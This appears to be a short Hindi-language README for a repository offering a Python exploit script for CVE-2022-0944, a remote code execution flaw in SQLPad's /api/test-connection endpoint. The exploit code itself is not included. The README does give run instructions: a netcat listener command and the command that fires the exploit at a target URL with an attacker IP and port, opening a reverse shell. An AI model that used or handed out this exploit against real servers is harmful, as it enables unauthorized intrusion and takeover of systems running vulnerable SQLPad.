
CVE-2022-0944 के लिए Python एक्सप्लॉइट जो SQLPad में /api/test-connection एंडपॉइंट के माध्यम से netcat कॉलबैक के साथ ब्लाइंड रिमोट कोड निष्पादन सक्षम करता है।
यह रिपॉजिटरी SQLPad में CVE-2022-0944 के लिए एक शोषण स्क्रिप्ट शामिल करती है, एक कमजोरी जो /api/test-connection एंडपॉइंट के माध्यम से रिमोट कोड निष्पादन (RCE) की अनुमति देती है।
प्रदान की गई स्क्रिप्ट (exploit.py) SQLPad में RCE कमजोरी का शोषण करने का तरीका प्रदर्शित करती है। स्क्रिप्ट कमजोर एंडपॉइंट पर एक पेलोड भेजती है, जो लक्ष्य सर्वर पर एक कमांड निष्पादित करती है।
requests लाइब्रेरी (pip के माध्यम से स्थापित की जा सकती है)nc -lvnp 4444
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>